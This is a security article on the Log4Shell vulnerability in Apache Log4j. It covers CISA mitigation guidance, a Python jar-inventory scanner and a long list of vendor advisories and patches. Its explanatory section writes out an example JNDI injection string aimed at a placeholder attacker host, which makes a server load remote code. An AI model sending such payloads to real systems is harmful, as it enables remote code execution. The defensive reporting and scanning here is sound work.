Log4j Vulnerable Product List and Recommended Countermeasures, Patches, and Update Items from Vendors


News has broken that there is a critical vulnerability in the Apache Log4j logging library.

Log4j is an open source Java logging framework that is part of Apache Logging Services and is used at the enterprise level in a variety of applications from vendors around the world.

Apache has released Log4j 2.15.0 to address a vulnerability of the highest severity (CVE-2021-44228, also known as Log4Shell or LogJam); the follow-up releases 2.16.0 and 2.17.0 address the related CVE-2021-45046 and CVE-2021-45105 that were found afterwards.

According to data from Cloudflare and Cisco Talos, attacks have been detected since the beginning of this month, although large-scale exploitation only began after the exploit code became freely available.

The Log4Shell vulnerability was reported by Alibaba’s cloud security team on November 24, but it is unclear why some attackers were able to exploit it so quickly.

Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), said the agency is working with private and public sector partners to address the issue.

Apache Log4j Vulnerability Guidance | CISA

We are acting urgently to promote defensive measures for this vulnerability and to detect related threat activity.

We are adding this vulnerability to our catalog of known vulnerabilities that are being exploited and are telling federal civilian agencies and non-federal partners to urgently patch or fix this vulnerability.

Log4Shell allows unauthenticated remote code execution through Java Naming and Directory Interface (JNDI) injection. Any attacker-controlled string that the application ends up logging can carry the payload; the classic example is setting the browser's User-Agent header to a string of the form ${jndi:ldap://[attacker_URL]}.

The string is written to the victim's web server log, and when Log4j formats the message it evaluates the ${jndi:...} lookup and makes an LDAP (or RMI, DNS, and so on) request to the attacker's host. The attacker's server answers with a reference to a remote Java class, or with a serialized Java object, which the victim JVM loads and executes, so the attacker can pass encoded commands or Java classes to the vulnerable machine.

Given the severity of this vulnerability and the ease with which it can be exploited, CISA has issued guidance to help organizations set up defenses against Log4Shell attacks.

CISA recommends “applying any available patches immediately” and requires that this process be prioritized.

Priority should go first to mission-critical systems, Internet-facing systems, and servers reachable from the network; after that, CISA recommends prioritizing patches for other affected information technology and operational technology assets.

If you are unable to patch, the following mitigation is recommended.

Set the Java system property log4j2.formatMsgNoLookups to true, for example by adding -Dlog4j2.formatMsgNoLookups=true to the Java Virtual Machine's application startup command, or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. This disables message lookups, so a logged ${jndi:...} string is no longer evaluated. Note the spelling: the property is formatMsgNoLookups, and a misspelled property is silently ignored by the JVM.

This workaround exists only in Log4j 2.10 and later, and it was later found to be incomplete: CVE-2021-45046 showed that in certain non-default configurations, such as a pattern layout that itself uses a context lookup like ${ctx:loginId}, attacker-controlled data can still reach the JNDI lookup even with the flag set. Apache's current guidance for Log4j 2.x is therefore to upgrade, or, where that is impossible, to remove the JndiLookup class from the log4j-core jar, which prevents the lookup from being evaluated at all.
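Both mitigations presuppose that you know which log4j-core jars are on the host and which version each one is. The following Python script is an added example (not code from the original article or from Apache): it walks a directory tree for log4j-core jars, reads the version from the jar manifest, checks whether JndiLookup.class is still present, and maps that to the fix thresholds of the three CVEs. The sample jars the demo writes are constructed in memory and contain only a manifest and a placeholder class entry.

```python
"""Inventory log4j-core jars and rate them against the Log4Shell fixes.

Added example for this article, not code from Apache or from any vendor it
lists. The sample jars the demo writes are constructed in memory and hold
only a manifest plus a placeholder JndiLookup.class entry.

Fix thresholds (Apache Log4j security page):
  CVE-2021-44228  fixed in 2.15.0  (2.12.2 on the Java 7 line)
  CVE-2021-45046  fixed in 2.16.0  (2.12.2)
  CVE-2021-45105  fixed in 2.17.0  (2.12.3)
The formatMsgNoLookups property only exists from 2.10.0.
"""
import io
import re
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0' -> (2, 0, 0); None or garbage -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None


def inspect_jar(data):
    """Return (version or None, jndi_lookup_present) for a jar given as bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            version = m.group(1) if m else None
    return version, JNDI_CLASS in names


def assess(version, jndi_lookup_present):
    """Map a version string and the JndiLookup presence to a verdict."""
    v = parse_version(version)
    if v is None:
        return "unknown"            # treat as vulnerable until proven otherwise
    if v[0] != 2:
        return "not-log4j2"         # Log4j 1.x has different issues; out of scope here
    if not jndi_lookup_present:
        return "mitigated"          # class removed: the JNDI lookup cannot run
    java7_line = v[:2] == (2, 12)
    if v >= ((2, 12, 3) if java7_line else (2, 17, 0)):
        return "fixed"
    if v >= ((2, 12, 2) if java7_line else (2, 16, 0)):
        return "dos-only"           # CVE-2021-45105 remains
    if v >= (2, 15, 0):
        return "partial"            # CVE-2021-45046 in non-default layouts
    if v >= (2, 10, 0):
        return "vulnerable-flag-available"   # the runtime flag may be set; a jar scan cannot tell
    return "vulnerable"             # no property workaround before 2.10


def scan_tree(root):
    """Walk root for log4j-core*.jar; return {path: (version, jndi_present, verdict)}."""
    results = {}
    for path in Path(root).rglob("log4j-core*.jar"):
        version, jndi = inspect_jar(path.read_bytes())
        if version is None:                       # fall back to the file name
            m = re.search(r"log4j-core-(\d+(?:\.\d+)*)", path.name)
            version = m.group(1) if m else None
        results[str(path)] = (version, jndi, assess(version, jndi))
    return results


def build_sample_jar(version, with_jndi_lookup=True):
    """Constructed stand-in for a real log4j-core jar (demo only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder, not real bytecode
    return buf.getvalue()


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp, "app", "WEB-INF", "lib")
        lib.mkdir(parents=True)
        (lib / "log4j-core-2.14.1.jar").write_bytes(build_sample_jar("2.14.1"))
        (lib / "log4j-core-2.14.1-stripped.jar").write_bytes(build_sample_jar("2.14.1", False))
        (lib / "log4j-core-2.15.0.jar").write_bytes(build_sample_jar("2.15.0"))
        (lib / "log4j-core-2.17.1.jar").write_bytes(build_sample_jar("2.17.1"))
        for path, (version, jndi, verdict) in sorted(scan_tree(tmp).items()):
            state = "present" if jndi else "removed"
            print(f"{Path(path).name}: version={version} JndiLookup={state} -> {verdict}")
```

To strip the class from a jar that cannot be upgraded yet, Apache's documented procedure is zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class; rerun the scan afterwards and the verdict changes to mitigated. Two limits to keep in mind: fat jars, WAR/EAR archives and shaded copies that rename the package are not found by this file-name match, so nested archives need to be opened as well, and the property workaround is a runtime setting that no jar scan can see, which is why a 2.10 to 2.14.x jar is still reported as needing an upgrade.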

Right after the details of Log4Shell were revealed, vendors started to investigate whether their products would be affected and listed information about the results.

Amazon

Amazon has updated some of its services to use a non-vulnerable version of the Log4j component and says it is working on updates for other products, or will release new versions, in the near future.

Details of the affected services have been published, including OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass, and API Gateway.

Update on the Apache Log4j2 Security Bulletin (CVE-2021-44228)

Atlassian

According to the company, it does not believe any of its on-premises products can be exploited in their default configuration.

If the default logging configuration (log4j.properties) is changed to enable the JMS appender, products such as Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible and others may be exposed to remote code execution.

Broadcom

Broadcom has published mitigations and knowledge base articles for several Symantec products that are affected by the Log4j vulnerability. These products include CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-On), VIP Authentication Hub, and Symantec Endpoint Protection Manager (SEPM).

Support Content Notification - Support Portal - Broadcom support portal

Cisco

Cisco has released a list of products affected by Log4Shell and a schedule for patching starting December 14.

The products affected are from various categories, such as

  • Network and Content Security Devices (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
  • Collaboration and Social Media (Cisco Webex Meetings Server)
  • Network Management and Provisioning (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
  • Enterprise Routing and Switching (Cisco Network Assurance Engine, Cisco SD-WAN vManage)
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd#vp

Citrix

Citrix does not list any products as being vulnerable to Log4Shell, although research is ongoing and the situation may change for some products.

ConnectWise

ConnectWise said its cloud service, Perch, was found to rely on a third-party component with a “potential vulnerability”.

The third-party component turned out to be Fortinet's FortiSIEM, used in ConnectWise's StratoZen solution, and the company temporarily restricted access to the hosted StratoZen servers. Access to most services has since been restored.

ConnectWise | Trust Center | Advisories

cPanel

According to the forum thread, only installations with the cPanel Solr plugin are affected, and the issue is exploitable only locally.

We are pleased to announce that an update with mitigations for Log4Shell is available in the cpanel-dovecot-solr package.

https://forums.cpanel.net/threads/log4j-cve-2021-44228-does-it-affect-cpanel.696249/

Debian

Patched Log4j packages have been released as security updates for Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), and 12 (Bookworm).

Docker

It has been discovered that 12 official Docker images use a vulnerable version of the Log4j library. This list includes couchbase, elasticsearch, logstash, sonarqube, and solr.

Docker says it is “in the process of updating Log4j 2 in these images to the latest available version”, and that some of these images may not be exploitable even though they contain the library.

https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/

FortiGuard

According to the company, about 10 of its products are vulnerable, and fixes or mitigations have already been introduced for four of them.

FortiGuard announced that it is updating its advisory to include the effective dates of fixes for other products, including FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy, and ShieldX.

FortiGuard

F-Secure

Both the Windows and Linux versions of several F-Secure products are affected by Log4Shell: Policy Manager (Policy Manager Server component only), Policy Manager Proxy, Endpoint Proxy, and Elements Connector.

The company has created a security patch for administrators to fix this issue, and provides step-by-step instructions for deploying it.

F-Secure Community

Ghidra

The NSA's open source reverse engineering tool has been updated to version 10.1, which upgrades its Log4j dependency to a non-vulnerable release.


IBM

According to IBM's Log4Shell advisory, only WebSphere Application Server versions 9.0 and 8.5 are affected, via the Admin Console and UDDI Registry Application components, and the issue has been addressed.

IBM Security Bulletins - IBM Support

Juniper Networks

Networking company Juniper Networks has revealed that four of its products are affected: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder, and Paragon Planner.

Six additional products are under investigation and potentially affected: the JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics, and Security Director (Security Director Insights is not affected).

https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259

McAfee

The company has not yet completed its evaluation and says it is investigating 12 products.

https://kc.mcafee.com/corporate/index?page=content&id=KB95091

MongoDB

Only MongoDB Atlas Search needs to be patched against Log4Shell, the company commented.

The developer states that no evidence of exploitation or indicators of compromise were found before the patch was deployed.

Log4Shell Vulnerability (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105) and MongoDB | MongoDB Blog

Okta

Okta has released an update to the Okta RADIUS Server Agent and Okta On-Prem MFA Agent to mitigate the risk posed by the Log4Shell vulnerability, and strongly recommends that users apply the fix from the Admin Console.


Okta’s response to CVE-2021-44228 (“Log4Shell”)
Last Updated: 1/12/2022 3.30pm Pacific Time The Okta Security team continues to investigate and evaluate the Log4j Java ...

Oracle

Oracle has announced that “several” of its products are using vulnerable versions of the Log4j component.

The company has issued a security alert pointing to a My Oracle Support document and strongly recommends applying the provided updates “as soon as possible”.

https://blogs.oracle.com/security/post/cve-2021-44228

OWASP Foundation

It has been discovered that versions of the Zed Attack Proxy (ZAP) web app scanner below 2.11.1 use a vulnerable Log4j component.

ZAP and Log4Shell
ZAP appears to be impacted by the Log4Shell vulnerability - CVE-2021-44228. We have released ZAP 2.11.1 which fixes the ...

Red Hat

Red Hat has announced that components of several Red Hat products are affected by Log4Shell and strongly recommends that you apply updates as soon as they become available.

The products listed are Red Hat OpenShift 4 and 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8, and Red Hat Fuse 7.

RHSB-2021-009 Log4Shell - Remote Code Execution - log4j (CVE-2021-44228) - Red Hat Customer Portal

SolarWinds

Server & Application Monitor (SAM) and Database Performance Analyzer (DPA) use a vulnerable version of Apache Log4j.

SolarWinds states, however, that both products use a version of the Java Development Kit (JDK) that is either unaffected by the Log4j vulnerability or at reduced risk.

SolarWinds Trust Center Security Advisories | CVE-2021-44228

SonicWall

SonicWall's ongoing investigation has revealed that its Email Security version 10.x is affected by the Log4Shell vulnerability.

A fix is currently under development and will be released “soon”.

According to the company’s advisory, five other SonicWall products are still under investigation, and the remaining products are unaffected by this issue.

Security Advisory

Splunk

Core Splunk Enterprise is unaffected unless you use Data Fabric Search.

The company publishes a list of the affected versions of its products, both cloud and on-premises.

So far Splunk has released fixes for some products and is working on rolling out updates for at least seven more.

Splunk Security Advisory for Apache Log4j (CVE-2021-44228, CVE-2021-45046 and others)

VMware

VMware has fixed several products vulnerable to Log4Shell attacks and is in the process of rolling out patches for 27 more products.

The latest revision of the advisory lists about 40 products as affected by this critical vulnerability. Many of them are labeled “Patch Pending”, and mitigations may be available for them in the meantime.

VMSA-2021-0028.13

Ubiquiti

The UniFi Network Application, which uses the Log4j library, has been updated to address a critical Log4Shell vulnerability.

https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1

Ubuntu

According to the security advisory, the Log4j package has been patched upstream, and updated packages have been released for Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo), and 21.10 (Impish Indri).

CVE-2021-44228 | Ubuntu

Zoho

Zoho has found that the ADAudit Plus component, which audits Active Directory changes and is part of the ManageEngine monitoring suite, is vulnerable to Log4Shell.

Zoho has outlined steps to mitigate this issue.

Steps to protect ADAudit Plus from Log4j vulnerabilities
Note: This post is not applicable for customers running build 7060 and above, as ADAudit Plus comes bundled with Log4j v...

Zscaler

Zscaler has patched several products that were using a vulnerable version of the Log4j library.

Having patched all Private Access (ZPA) services and the Zscaler Mobile Admin and Support Mobile Admin components, the company considers the issue fixed across all of its products.

Zscaler Trust

Summary

Some organizations may hold off on addressing Log4Shell because they believe that running a particular Java version reduces the chance of exploitation (newer JVMs default com.sun.jndi.ldap.object.trustURLCodebase to false, which blocks the remote class-loading variant of the attack). That is not sufficient; the Log4j library itself needs to be updated to the latest version.

Márcio Almeida, senior security engineer at graphic design platform Canva, warns that with the addition of support for LDAP serialized payloads in the JNDI Exploit Kit, Log4Shell attacks can now work on any version of Java. The reason is that instead of pointing the victim at a remote class, the attacker's LDAP server returns a serialized Java object that the victim deserializes locally, so the attack no longer depends on remote code base loading, only on a suitable gadget class being present on the victim's classpath.
